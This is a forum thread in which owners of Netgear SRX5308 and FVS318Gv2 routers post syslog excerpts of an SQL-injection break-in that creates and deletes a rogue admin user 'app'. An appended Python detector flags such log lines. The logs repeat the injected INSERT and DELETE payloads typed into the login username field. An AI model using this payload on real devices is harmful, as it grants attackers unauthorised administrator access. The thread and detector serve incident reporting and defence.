
Forum Discussion

laxamar
Aspirant
Sep 30, 2019

Successful hack of our SRX5308

Hi,

Our SRX5308 was successfully hacked on Sep 27th. They seem to have found a SQL password that keeps users in an internal database and injected a new user 'app'. We had SYSLOG to another machine, so we caught the successful attempt and steps:

I don't know how to prevent this attack later, as they seem to have a direct way to inject with a known DB password.


Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:43 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:46 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:19:51 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:53 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:55 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:58 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:59 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:20:03 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:04 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:08 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:11 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:12 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:30 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:20:31 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'


4 Replies

  • It seems like a very old school DB injection during log in. Seems that Netgear does not db_escape their user input. Gawd!

    •
      jec956613
      Tutor

      These have been out of support for a little while now. Sadly, Netgear hasn't seen fit to really replace them properly yet, so some vulnerability was bound to crop up eventually.

      •
        tetrawest
        Apprentice

        This is the reason I upgraded my perfectly working Prosafe FVS336Gv3 VPN routers to the BR500, end of support and firmware upgrades. Sadly, the BR500 is not reliable. 

  • Same exploit on my FVS318Gv2 running firmware 4.3.5-3. Same user "app" added via SQL insertion on the login/password form. Not clear if anything was taken. 


    [FVS318Gv2]Wed Nov 20 06:51:56 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Administrator app is successfully added. Group: geardomain User TimeOut: 5

    [FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90

    [FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90

    [FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90

    [FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90

    [FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'

    [FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'

    [FVS318Gv2]Wed Nov 20 06:52:17 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Deleted User app
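The SRX5308 and FVS318Gv2 excerpts in this thread carry the same SSL_ERROR / SSL_INFO message text under different line prefixes, so one detector can cover both. The Python below is an added example, not code from either poster or from NETGEAR: it flags login attempts whose "username" is really SQL, notes which account that SQL creates or names, and then reports Admin logins by that account. The allow list of known administrators, the alert names and the one benign login line are assumptions.

```python
import re

# Message patterns shared by both device formats; search() skips the prefixes.
FAILED_LOGIN = re.compile(r"Invalid Password for user (?P<user>.+)$")
SUCCESS_LOGIN = re.compile(r"Login Successful for \S+ user (?P<user>\w+)"
                           r"\((?P<role>\w+)\) from host (?P<ip>[\d.]+)")
USER_ADDED = re.compile(r"Administrator (?P<user>\w+) is successfully added")
# A "username" holding a quote followed by a statement separator, or a DML
# keyword, is not a typed credential; it is SQL pushed through the login form.
SQL_META = re.compile(r"'\s*;|\b(insert|delete|update|drop|union|select)\b", re.I)
SQL_TARGET = re.compile(r"UserName\s*=\s*'(?P<user>\w+)'", re.I)

# Constructed sample: lines quoted from the two posts above (the INSERT line is
# truncated as in the post) plus one invented legitimate login for contrast.
SAMPLE_LOG = [
    "Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user "
    "myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,",
    "Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for "
    "geardomain user app(Admin) from host 45.77.35.64",
    "Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user "
    "myxxxx';delete from USERDBUsers where UserName='app';'",
    "Sep 27 17:02:10 SRX5308 LOGIN [System] SSL_INFO : Login Successful for "
    "geardomain user admin(Admin) from host 192.0.2.10",  # invented benign line
    "[FVS318Gv2]Wed Nov 20 06:51:56 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] "
    "Administrator app is successfully added. Group: geardomain User TimeOut: 5",
    "[FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] "
    "SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90",
    "[FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] "
    "SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'",
]

def analyze(lines, known_admins):
    """Return alerts sorted by line number. known_admins is the assumed allow list."""
    alerts, suspect_users = [], set()
    # Pass 1: injected SQL in the username field, and the accounts it names or creates.
    for n, line in enumerate(lines, 1):
        m = FAILED_LOGIN.search(line)
        if m and SQL_META.search(m["user"]):
            alerts.append({"line": n, "kind": "sqli_attempt", "user": m["user"][:40]})
            suspect_users.update(t["user"] for t in SQL_TARGET.finditer(m["user"]))
        m = USER_ADDED.search(line)
        if m and m["user"] not in known_admins:
            suspect_users.add(m["user"])
            alerts.append({"line": n, "kind": "unexpected_admin_added", "user": m["user"]})
    # Pass 2: Admin logins by accounts that are unknown, or that the injected SQL named.
    for n, line in enumerate(lines, 1):
        m = SUCCESS_LOGIN.search(line)
        if m and m["role"] == "Admin" and m["user"] not in known_admins:
            kind = "injected_user_login" if m["user"] in suspect_users else "unknown_admin_login"
            alerts.append({"line": n, "kind": kind, "user": m["user"], "ip": m["ip"]})
    return sorted(alerts, key=lambda a: a["line"])

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG, known_admins={"admin"}):
        print(alert)
```

Feed it the raw syslog stream from the remote collector the original poster already had in place; the second pass is what turns a noisy "invalid password" line into an alert on the account the attacker actually used.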
